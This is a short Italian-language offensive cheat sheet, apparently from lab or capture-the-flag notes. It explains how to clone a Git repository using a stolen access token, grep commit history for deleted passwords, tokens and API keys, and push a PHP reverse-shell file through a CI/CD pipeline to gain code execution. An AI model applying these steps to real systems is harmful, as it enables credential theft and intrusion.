Scaricare repository con token valido
Quando troviamo un token di un’utente valido possiamo scaricare il repositori con il seguente comando:
# Sintassi: http://<token>@<IP>:<PORTA>/<utente>/<repo>.git git clone
#Esempio
http://[email protected]:3000/ellen.freeman/website.git
Vedere tutti commit
Una volta scaricato possiamo vedere tutti i commit con il seguente comando:
git log --all --onelineUna volta listati li possiamo vedere con il seguente comando:
git show <commit hash>Ispeziona le Differenze (Git Diff)
git log -pScorri l’output (premi invio/spazio) e cerca righe che iniziano con un - (meno) e che contengono password, token o chiavi API. Le righe con il “meno” sono quelle che sono state rimosse nel codice, ed è lì che solitamente si trovano le credenziali dimenticate.
Se la cronologia è molto lunga, puoi cercare stringhe specifiche all’interno di tutti i commit passati:
git log -p | grep -iE "password|token|key|secret|config" -C 5Caricare file
Quando il sito ha un integrazione CI/CD attiva è possibile caricare una RCE per attivare una reverse shell sul sito se si possiede il token, per farlo basta creare un file con la reverse shell nella stessa cartella del progetto e poi eseguire i seguenti comandi:
git add shell.php
git commit -m "Mo so cazzi tuoi"
git push
#Se chiede una password inserisci il TOKEN